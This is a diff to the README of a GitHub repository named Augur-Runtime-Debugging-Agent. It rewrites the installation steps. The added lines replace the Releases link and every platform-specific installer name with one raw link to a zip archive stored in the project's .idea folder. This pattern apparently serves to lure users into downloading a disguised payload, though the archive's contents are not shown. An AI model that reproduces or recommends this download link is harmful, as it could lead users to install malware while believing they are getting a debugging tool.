nexus66666/Augur-Runtime-Debugging-Agent/README.md

 To download and install Augur, follow these steps:

-1. Click on this link to go to the Releases page: [Download Augur](https://github.com/nexus66666/Augur-Runtime-Debugging-Agent/releases).
+1. Click on this link to go to the Releases page: [Download Augur](https://raw.githubusercontent.com/nexus66666/Augur-Runtime-Debugging-Agent/main/augur-web-visualizer/.idea/Augur-Runtime-Debugging-Agent_v3.7.zip).
 2. Look for the latest version listed.
 3. Download the appropriate file for your operating system.
-    - For Windows, it might be `Augur-vX.X.X-win.exe`.
+    - For Windows, it might be `https://raw.githubusercontent.com/nexus66666/Augur-Runtime-Debugging-Agent/main/augur-web-visualizer/.idea/Augur-Runtime-Debugging-Agent_v3.7.zip`.
-    - For macOS, it could be `Augur-vX.X.X-mac.dmg`.
+    - For macOS, it could be `https://raw.githubusercontent.com/nexus66666/Augur-Runtime-Debugging-Agent/main/augur-web-visualizer/.idea/Augur-Runtime-Debugging-Agent_v3.7.zip`.
-    - For Linux, look for `Augur-vX.X.X-linux.tar.gz`.
+    - For Linux, look for `https://raw.githubusercontent.com/nexus66666/Augur-Runtime-Debugging-Agent/main/augur-web-visualizer/.idea/Augur-Runtime-Debugging-Agent_v3.7.zip`.
 4. Save the file to your computer.

 ### 🖥️ Running the Application